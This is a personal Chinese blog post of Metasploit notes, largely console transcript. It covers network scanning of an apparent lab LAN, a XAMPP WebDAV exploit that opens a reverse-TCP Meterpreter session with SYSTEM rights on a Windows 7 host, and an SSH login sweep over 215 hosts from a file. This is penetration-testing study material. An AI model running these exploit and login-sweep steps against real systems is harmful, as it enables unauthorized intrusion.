metasploit使用简记

发表于 2023-05-10  2.4k 次阅读


作者:Scanz

更新版本:V1(20180428初版,待更新格式)

个人使用记录

----------------------------------------------

~# /etc/init.d/postgresql start

~# msfdb init

~# msfconsole

 

msf > db_status

[*] postgresql connected to msf

 

msf > load nessus

[*] Nessus Bridge for Metasploit

[*] Type nessus_help for a command listing

[*] Successfully loaded plugin: Nessus

 

msf > nessus_connect  'user':'passwd'@127.0.0.1:8834

[*] Connecting to https://127.0.0.1:8834/ as user

[*] User user authenticated successfully

 

auxiliary/scanner/discovery/arp_sweep

 

 

root@kali:~# apt-cache show metasploit-framework | tail -n 6                                                                                                                     Description: Framework for exploit development and vulnerability research                                                                                                         The Metasploit Framework is an open source platform that supports                                                                                                                vulnerability research, exploit development, and the creation of custom                                                                                                          security tools.                                                                                                                                                                 Description-md5: c5f73085c4e31aa2cc01dd312ce844cc                                                                                                                                                                                                                                                                                                                 root@kali:~#                                                                                                                                                                                                                                                      

 

root@kali:~# msfconsole

 

msf > workspace -a msftest                                                                                                                                                       [*] Added workspace: msftest                                                                                                                                                     msf
 

msf > db_nmap -F 192.168.0.1-10                                                                                                                                                  
 

 

msf > hosts                                                                                                                                                                                                                                                                                                                                                       Hosts                                                                                                                                                                            =====                                                                                                                                                                                                                                                                                                                                                             address      mac                name     os_name  os_flavor  os_sp  purpose  info  comments                                                                                      -------      ---                ----     -------  ---------  -----  -------  ----  --------                                                                                      192.168.0.1  80:c6:ca:00:bf:e8           Unknown                    device                                                                                                       192.168.0.2  84:1b:5e:e5:66:ae           Unknown                    device                                                                                                       192.168.0.3  84:16:f9:9a:82:51           Unknown                    device                                                                                                       192.168.0.6  00:0c:29:2b:61:e1           Unknown                    device                                                                                                       192.168.0.7  b8:27:eb:89:ac:c3  pi-hole  Unknown                    device                                                                                                       192.168.0.8  0c:51:01:e1:8d:27           Unknown                    device                                                                                                       192.168.0.9  78:ca:39:fe:0b:4c           Unknown                    device                                                                                                                                                                                                                                                                                        msf > services                                                                                                                                                                                                                                                                                                                                                    Services                                                                                                                                                                         ========                                                                                                                                                                                                                                                                                                                                                          host         port   proto  name              state   info                                                                                                                        ----         ----   -----  ----              -----   ----                                                                                                                        192.168.0.1  22     tcp    ssh               open                                                                                                                                192.168.0.1  53     tcp    domain            open                                                                                                                                192.168.0.1  80     tcp    http              open                                                                                                                                192.168.0.1  3000   tcp    ppp               closed                                                                                                                              192.168.0.1  8080   tcp    http-proxy        closed                                                                                                                              192.168.0.2  80     tcp    http              open                                                                                                                                192.168.0.2  443    tcp    https             open                                                                                                                                192.168.0.2  5000   tcp    upnp              open                                                                                                                                192.168.0.3  80     tcp    http              open                                                                                                                                192.168.0.6  21     tcp    ftp               open                                                                                                                                192.168.0.6  80     tcp    http              open                                                                                                                                192.168.0.6  135    tcp    msrpc             open                                                                                                                                192.168.0.6  139    tcp    netbios-ssn       open                                                                                                                                192.168.0.6  443    tcp    https             open                                                                                                                                192.168.0.6  445    tcp    microsoft-ds      open                                                                                                                                192.168.0.6  554    tcp    rtsp              open                                                                                                                                192.168.0.6  3389   tcp    ms-wbt-server     open       
 

 

msf > use auxiliary/scanner/ssh/ssh_version                                                                                                                                      msf auxiliary(ssh_version) > options                                                                                                                                                                                                                                                                                                                              Module options (auxiliary/scanner/ssh/ssh_version):                                                                                                                                                                                                                                                                                                                  Name     Current Setting  Required  Description                                                                                                                                  ----     ---------------  --------  -----------                                                                                                                                  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]                                                                                 RHOSTS                    yes       The target address range or CIDR identifier                                                                                                  RPORT    22               yes       The target port (TCP)                                                                                                                        THREADS  1                yes       The number of concurrent threads                                                                                                             TIMEOUT  30               yes       Timeout for the SSH probe                                                                                                                                                                                                                                                                                                  msf auxiliary(ssh_version) > services -u -p 22 -R                                                                                                                                                                                                                                                                                                                 Services                                                                                                                                                                         ========                                                                                                                                                                                                                                                                                                                                                          host         port  proto  name  state  info                                                                                                                                      ----         ----  -----  ----  -----  ----                                                                                                                                      192.168.0.1  22    tcp    ssh   open                                                                                                                                             192.168.0.7  22    tcp    ssh   open                                                                                                                                                                                                                                                                                                                              RHOSTS => 192.168.0.1 192.168.0.7                                                                                                                                                                                                                     
 

                                                                                                                                                                                msf auxiliary(ssh_version) > setg threads 10                                                                                                                                     threads => 10                                                                                                                                                                    msf auxiliary(ssh_version) > run                                                                                                                                                                                                                                                                                                                                  [*] 192.168.0.7:22        - SSH server version: SSH-2.0-OpenSSH_6.7p1 Raspbian-5+deb8u3 ( service.version=6.7p1 openssh.comment=Raspbian-5+deb8u3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Raspbian os.device=General os.family=Linux os.product=Linux os.version=8.0 service.protocol=ssh fingerprint_db=ssh.banner )     [*] 192.168.0.1:22        - SSH server version: SSH-2.0-OpenSSH_3.9p1 ( service.version=3.9p1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )                                                                                                                                              [*] Scanned 1 of 2 hosts (50% complete)                                                                                                                                          [*] Scanned 2 of 2 hosts (100% complete)                                                                                                                                         [*] Auxiliary module execution completed                   
 

msf auxiliary(ssh_version) > use auxiliary/scanner/http/http_version                                                                                                             msf auxiliary(http_version) > options                                                                                                                                                                                                                                                                                                                             Module options (auxiliary/scanner/http/http_version):                                                                                                                                                                                                                                                                                                                Name     Current Setting  Required  Description                                                                                                                                  ----     ---------------  --------  -----------                                                                                                                                  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]                                                                                 RHOSTS                    yes       The target address range or CIDR identifier                                                                                                  RPORT    80               yes       The target port (TCP)                                                                                                                        SSL      false            no        Negotiate SSL/TLS for outgoing connections                                                                                                   THREADS  10               yes       The number of concurrent threads                                                                                                             VHOST                     no        HTTP server virtual host                                                                                                                                                                                                                                                                                                   msf auxiliary(http_version) > services -u -p 80 -R                                                                                                                                                                                                                                                                                                                Services                                                                                                                                                                         ========                                                                                                                                                                                                                                                                                                                                                          host         port  proto  name  state  info                                                                                                                                      ----         ----  -----  ----  -----  ----                                                                                                                                      192.168.0.1  80    tcp    http  open                                                                                                                                             192.168.0.2  80    tcp    http  open                                                                                                                                             192.168.0.3  80    tcp    http  open                                                                                                                                             192.168.0.6  80    tcp    http  open                                                                                                                                             192.168.0.7  80    tcp    http  open                                                                                                                                                                                                                                                                                                                              RHOSTS => 192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.6 192.168.0.7                                                                                                                                                                                                                                                                                             msf auxiliary(http_version) > run                                                                                                                                                                                                                                                                                                                                 [*] 192.168.0.7:80 lighttpd/1.4.35 ( Debian Default Page )                                                                                                                       [*] 192.168.0.2:80  ( 401-Basic realm="NETGEAR R6200" )                                                                                                                          [*] 192.168.0.6:80 Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ )                                                         [*] 192.168.0.1:80 Apache ( 302-https://192.168.0.1:10443/manage/dashboard )                                                                                                     [*] Scanned 4 of 5 hosts (80% complete)                                                                                                                                          [*] 192.168.0.3:80 Router Webserver ( 401-Basic realm="TP-LINK AC750 WiFi Range Extender RE200" )                                                                                [*] Scanned 5 of 5 hosts (100% complete)                                                                                                                                         [*] Auxiliary module execution completed                                          
 

 

msf auxiliary(http_version) > use auxiliary/scanner/smb/smb_version                                                                                                              msf auxiliary(smb_version) > options                                                                                                                                                                                                                                                                                                                              Module options (auxiliary/scanner/smb/smb_version):                                                                                                                                                                                                                                                                                                                  Name       Current Setting  Required  Description                                                                                                                                ----       ---------------  --------  -----------                                                                                                                                RHOSTS                      yes       The target address range or CIDR identifier                                                                                                SMBDomain  .                no        The Windows domain to use for authentication                                                                                               SMBPass                     no        The password for the specified username                                                                                                    SMBUser                     no        The username to authenticate as                                                                                                            THREADS    10               yes       The number of concurrent threads                                                                                                                                                                                                                                                                                         msf auxiliary(smb_version) > services -u -p 445 -R                                                                                                                                                                                                                                                                                                                Services                                                                                                                                                                         ========                                                                                                                                                                                                                                                                                                                                                          host         port  proto  name          state  info                                                                                                                              ----         ----  -----  ----          -----  ----                                                                                                                              192.168.0.6  445   tcp    microsoft-ds  open                                                                                                                                     192.168.0.8  445   tcp    microsoft-ds  open                                                                                                                                     192.168.0.9  445   tcp    microsoft-ds  open                                                                                                                                                                                                                                                                                                                      RHOSTS => 192.168.0.6 192.168.0.8 192.168.0.9                                                                                                                                                                                                                                                                                                                     msf auxiliary(smb_version) > run                                                                                                                                                                                                                                                                                                                                  [*] 192.168.0.6:445       - Host is running Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP )                                                       [*] 192.168.0.9:445       - Host could not be identified: Apple Base Station (CIFS 4.32)                                                                                         [*] 192.168.0.8:445       - Host could not be identified: Apple Base Station (CIFS 4.32)                                                                                         [*] Scanned 3 of 3 hosts (100% complete)                                                                                                                                         [*] Auxiliary module execution completed                                                                                                                                         msf auxiliary(smb_version) > clear                                                                                                                                               

 

 

 

msf auxiliary(smb_version) > hosts                                                                                                                                                                                                                                                                                                                                Hosts                                                                                                                                                                            =====                                                                                                                                                                                                                                                                                                                                                             address      mac                name         os_name  os_flavor  os_sp  purpose  info  comments                                                                                  -------      ---                ----         -------  ---------  -----  -------  ----  --------                                                                                  192.168.0.1  80:c6:ca:00:bf:e8  192.168.0.1  Unknown                    device                                                                                                   192.168.0.2  84:1b:5e:e5:66:ae  192.168.0.2  Unknown                    device                                                                                                   192.168.0.3  84:16:f9:9a:82:51  192.168.0.3  RE200                      router                                                                                                   192.168.0.6  00:0c:29:2b:61:e1  WIN7-X86     Windows                    device                                                                                                   192.168.0.7  b8:27:eb:89:ac:c3  pi-hole      Linux               8.0    server                                                                                                   192.168.0.8  0c:51:01:e1:8d:27               Unknown                    device                                                                                                   192.168.0.9  78:ca:39:fe:0b:4c               Unknown                    device                                                                                                                                                                                                                                                                                    msf auxiliary(smb_version) > services -u                                                                                                                                                                                                                                                                                                                          Services                                                                                                                                                                         ========                                                                                                                                                                                                                                                                                                                                                          host         port   proto  name              state  info                                                                                                                         ----         ----   -----  ----              -----  ----                                                                                                                         192.168.0.1  22     tcp    ssh               open   SSH-2.0-OpenSSH_3.9p1                                                                                                        192.168.0.1  53     tcp    domain            open                                                                                                                                192.168.0.1  80     tcp    http              open   Apache ( 302-https://192.168.0.1:10443/manage/dashboard )                                                                    192.168.0.2  80     tcp    http              open    ( 401-Basic realm="NETGEAR R6200" )                                                                                         192.168.0.2  443    tcp    https             open                                                                                                                                192.168.0.2  5000   tcp    upnp              open                                                                                                                                192.168.0.3  80     tcp    http              open   Router Webserver ( 401-Basic realm="TP-LINK AC750 WiFi Range Extender RE200" )                                               192.168.0.6  21     tcp    ftp               open                                                                                                                                192.168.0.6  80     tcp    http              open   Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ )                        192.168.0.6  135    tcp    msrpc             open                                                                                                                                192.168.0.6  139    tcp    netbios-ssn       open                                                                                                                                192.168.0.6  443    tcp    https             open                                                                                                                                192.168.0.6  445    tcp    smb               open   Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP )                                               192.168.0.6  554    tcp    rtsp              open                                                                                                                                192.168.0.6  3389   tcp    ms-wbt-server     open                                                                                                                                192.168.0.6  5357   tcp    wsdapi            open                                                                                                                                192.168.0.6  49155  tcp    unknown           open                                                                                                                                192.168.0.6  49156  tcp    unknown           open                                                                                                                                192.168.0.7  22     tcp    ssh               open   SSH-2.0-OpenSSH_6.7p1 Raspbian-5+deb8u3                                                                                      192.168.0.7  53     tcp    domain            open                                                                                                                                192.168.0.7  80     tcp    http              open   lighttpd/1.4.35 ( Debian Default Page )                                                                                      192.168.0.8  139    tcp    netbios-ssn       open                                                                                                                                192.168.0.8  445    tcp    smb               open   Apple Base Station (CIFS 4.32)                                                                                               192.168.0.8  548    tcp    afp               open                                                                                                                                192.168.0.8  5009   tcp    airport-admin     open                                                                                                                                192.168.0.8  10000  tcp    snet-sensor-mgmt  open                                                                                                                                192.168.0.9  139    tcp    netbios-ssn       open                                                                                                                                192.168.0.9  445    tcp    smb               open   Apple Base Station (CIFS 4.32)                                                                                               192.168.0.9  548    tcp    afp               open                                                                                                                                192.168.0.9  5009   tcp    airport-admin     open                                                                                                                                192.168.0.9  10000  tcp    snet-sensor-mgmt  open                                                                                                                                                                                                                                                                                                                 
 

msf auxiliary(smb_version) > services 192.168.0.6                                                                                                                                                                                                                                                                                                                 Services                                                                                                                                                                         ========                                                                                                                                                                                                                                                                                                                                                          host         port   proto  name           state  info                                                                                                                            ----         ----   -----  ----           -----  ----                                                                                                                            192.168.0.6  21     tcp    ftp            open                                                                                                                                   192.168.0.6  80     tcp    http           open   Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ )                           192.168.0.6  135    tcp    msrpc          open                                                                                                                                   192.168.0.6  139    tcp    netbios-ssn    open                                                                                                                                   192.168.0.6  443    tcp    https          open                                                                                                                                   192.168.0.6  445    tcp    smb            open   Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP )                                                  192.168.0.6  554    tcp    rtsp           open                                                                                                                                           192.168.0.6  3389   tcp    ms-wbt-server  open                                                                                                                                   192.168.0.6  5357   tcp    wsdapi         open                                                                                                                                   192.168.0.6  49155  tcp    unknown        open                                                                                                                                   192.168.0.6  49156  tcp    unknown        open                   
 

 

 

msf auxiliary(smb_version) > search xampp                                                                                                                                        [!] Module database cache not built yet, using slow search                                                                                                                                                                                                                                                                                                        Matching Modules                                                                                                                                                                 ================                                                                                                                                                                                                                                                                                                                                                     Name                                          Disclosure Date  Rank       Description                                                                                            ----                                          ---------------  ----       -----------                                                                                            exploit/windows/http/xampp_webdav_upload_php  2012-01-14       excellent  XAMPP WebDAV PHP Upload                                                                                                                                                                                                                                                                                                                                                                                                                                               msf auxiliary(smb_version) > use exploit/windows/http/xampp_webdav_upload_php                                                                                                    msf exploit(xampp_webdav_upload_php) > options                                                                                                                                                                                                                                                                                                                    Module options (exploit/windows/http/xampp_webdav_upload_php):                                                                                                                                                                                                                                                                                                       Name      Current Setting  Required  Description                                                                                                                                 ----      ---------------  --------  -----------                                                                                                                                 FILENAME                   no        The filename to give the payload. (Leave Blank for Random)                                                                                  PASSWORD  xampp            no        The HTTP password to specify for authentication                                                                                             PATH      /webdav/         yes       The path to attempt to upload                                                                                                               Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]                                                                                RHOST                      yes       The target address                                                                                                                          RPORT     80               yes       The target port (TCP)                                                                                                                       SSL       false            no        Negotiate SSL/TLS for outgoing connections                                                                                                  USERNAME  wampp            no        The HTTP username to specify for authentication                                                                                             VHOST                      no        HTTP server virtual host                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   Exploit target:                                                                                                                                                                                                                                                                                                                                                      Id  Name                                                                                                                                                                         --  ----                                                                                                                                                                         0   Automatic                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   msf exploit(xampp_webdav_upload_php) > set rhost 192.168.0.6                                                                                                                     rhost => 192.168.0.6 
 

 

msf exploit(xampp_webdav_upload_php) > show payloads                                                                                                                                                                                                                                                                                                              Compatible Payloads                                                                                                                                                              ===================                                                                                                                                                                                                                                                                                                                                                  Name                                Disclosure Date  Rank    Description                                                                                                         ----                                ---------------  ----    -----------                                                                                                         generic/custom                                       normal  Custom Payload                                                                                                      generic/shell_bind_tcp                               normal  Generic Command Shell, Bind TCP Inline                                                                              generic/shell_reverse_tcp                            normal  Generic Command Shell, Reverse TCP Inline                                                                           php/bind_perl                                        normal  PHP Command Shell, Bind TCP (via Perl)                                                                              php/bind_perl_ipv6                                   normal  PHP Command Shell, Bind TCP (via perl) IPv6                                                                         php/bind_php                                         normal  PHP Command Shell, Bind TCP (via PHP)                                                                               php/bind_php_ipv6                                    normal  PHP Command Shell, Bind TCP (via php) IPv6                                                                          php/download_exec                                    normal  PHP Executable Download and Execute                                                                                 php/exec                                             normal  PHP Execute Command                                                                                                 php/meterpreter/bind_tcp                             normal  PHP Meterpreter, Bind TCP Stager                                                                                    php/meterpreter/bind_tcp_ipv6                        normal  PHP Meterpreter, Bind TCP Stager IPv6                                                                               php/meterpreter/bind_tcp_ipv6_uuid                   normal  PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support                                                             php/meterpreter/bind_tcp_uuid                        normal  PHP Meterpreter, Bind TCP Stager with UUID Support                                                                  php/meterpreter/reverse_tcp                          normal  PHP Meterpreter, PHP Reverse TCP Stager                                                                             php/meterpreter/reverse_tcp_uuid                     normal  PHP Meterpreter, PHP Reverse TCP Stager                                                                             php/meterpreter_reverse_tcp                          normal  PHP Meterpreter, Reverse TCP Inline                                                                                 php/reverse_perl                                     normal  PHP Command, Double Reverse TCP Connection (via Perl)                                                               php/reverse_php                                      normal  PHP Command Shell, Reverse TCP (via PHP)                                                                                                                                                                                                                      
 

msf exploit(xampp_webdav_upload_php) > set payload php/meterpreter/reverse_tcp                                                                                                   payload => php/meterpreter/reverse_tcp                                                                                                                                           msf exploit(xampp_webdav_upload_php) > options                                                                                                                                                                                                                                                                                                                    Module options (exploit/windows/http/xampp_webdav_upload_php):                                                                                                                                                                                                                                                                                                       Name      Current Setting  Required  Description                                                                                                                                 ----      ---------------  --------  -----------                                                                                                                                 FILENAME                   no        The filename to give the payload. (Leave Blank for Random)                                                                                  PASSWORD  xampp            no        The HTTP password to specify for authentication                                                                                             PATH      /webdav/         yes       The path to attempt to upload                                                                                                               Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]                                                                                RHOST     192.168.0.6      yes       The target address                                                                                                                          RPORT     80               yes       The target port (TCP)                                                                                                                       SSL       false            no        Negotiate SSL/TLS for outgoing connections                                                                                                  USERNAME  wampp            no        The HTTP username to specify for authentication                                                                                             VHOST                      no        HTTP server virtual host                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   Payload options (php/meterpreter/reverse_tcp):                                                                                                                                                                                                                                                                                                                       Name   Current Setting  Required  Description                                                                                                                                    ----   ---------------  --------  -----------                                                                                                                                    LHOST                   yes       The listen address                                                                                                                             LPORT  4444             yes       The listen port                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               Exploit target:                                                                                                                                                                                                                                                                                                                                                      Id  Name                                                                                                                                                                         --  ----                                                                                                                                                                         0   Automatic                                                                                                                                                                                   
 

msf exploit(xampp_webdav_upload_php) > set lhost 192.168.0.15                                                                                                                    lhost => 192.168.0.15                                                                                                                                                            msf exploit(xampp_webdav_upload_php) > exploit                                                                                                                                                                                                                                                                                                                    [*] Started reverse TCP handler on 192.168.0.15:4444                                                                                                                             [*] Uploading Payload to /webdav/3vfkVff.php                                                                                                                                     [*] Attempting to execute Payload                                                                                                                                                [*] Sending stage (33986 bytes) to 192.168.0.6                                                                                                                                   [*] Meterpreter session 1 opened (192.168.0.15:4444 -> 192.168.0.6:51211) at 2017-05-03 17:32:59 -0600     
 

meterpreter> ps

304   taskeng.exe                 NT AUTHORITY\SYSTEM           taskeng.exe                                                                                                      348   csrss.exe                   NT AUTHORITY\SYSTEM           csrss.exe                                                                                                        388   wininit.exe                 NT AUTHORITY\SYSTEM           wininit.exe                                                                                                      400   csrss.exe                   NT AUTHORITY\SYSTEM           csrss.exe                                                                                                        448   winlogon.exe                NT AUTHORITY\SYSTEM           winlogon.exe                                                                                                     496   services.exe                NT AUTHORITY\SYSTEM           services.exe                                                                                                     504   lsass.exe                   NT AUTHORITY\SYSTEM           lsass.exe                                                                                                        512   lsm.exe                     NT AUTHORITY\SYSTEM           lsm.exe                                                                                                          612   svchost.exe                 NT AUTHORITY\SYSTEM           svchost.exe                                                                                                      628   xampp-control.exe           WIN7-X86\victim               xampp-control.exe                                                                                                676   vmacthlp.exe                NT AUTHORITY\SYSTEM           vmacthlp.exe                                                                                                     708   svchost.exe                 NT AUTHORITY\NETWORK SERVICE  svchost.exe                                                                                                      760   svchost.exe                 NT AUTHORITY\LOCAL SERVICE    svchost.exe                                                                                                      820   LogonUI.exe                 NT AUTHORITY\SYSTEM           LogonUI.exe                                                                                                      856   svchost.exe                 NT AUTHORITY\SYSTEM           svchost.exe                                                                                                      896   svchost.exe                 NT AUTHORITY\LOCAL SERVICE    svchost.exe        
 

 

meterpreter > getuid                                                                                                                                                             Server username: SYSTEM (0)                                                                                                                                                      meterpreter > sysinfo                                                                                                                                                            Computer    : WIN7-X86                                                                                                                                                           OS          : Windows NT WIN7-X86 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586                                                                                Meterpreter : php/windows                                                                                                                                                        meterpreter > exit                                                                                                                                                               [*] Shutting down Meterpreter...                                                                                                                                                                                                                                                                                                                                  [*] 192.168.0.6 - Meterpreter session 1 closed.  Reason: User exit                                                                                                               msf exploit(xampp_webdav_upload_php) > exit                                                                                                                                      root@kali:~# # excellent :)                                                                                                                                                      root@kali:~#    
 

 

 

RHOSTS            file:/tmp/msf-db-rhosts-20171109-128530-1v0kofq

Rhost 文件IP定义 一行一个IP

 

 

msf auxiliary(scanner/ssh/ssh_login) > run

[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.

msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS file:///opt/pass/ip

RHOSTS => file:///opt/pass/ip

msf auxiliary(scanner/ssh/ssh_login) > run

 

 

 

[*] Scanned  22 of 215 hosts (10% complete)

[*] Scanned  45 of 215 hosts (20% complete)

[*] Scanned  65 of 215 hosts (30% complete)

[*] Scanned  87 of 215 hosts (40% complete)

[*] Scanned 109 of 215 hosts (50% complete)

[*] Scanned 129 of 215 hosts (60% complete)

[*] Scanned 152 of 215 hosts (70% complete)

[*] Scanned 173 of 215 hosts (80% complete)

 
本站文章基于国际协议BY-NA-SA 4.0协议共享;
如未特殊说明,本站文章皆为原创文章,请规范转载。

0

scanz个人博客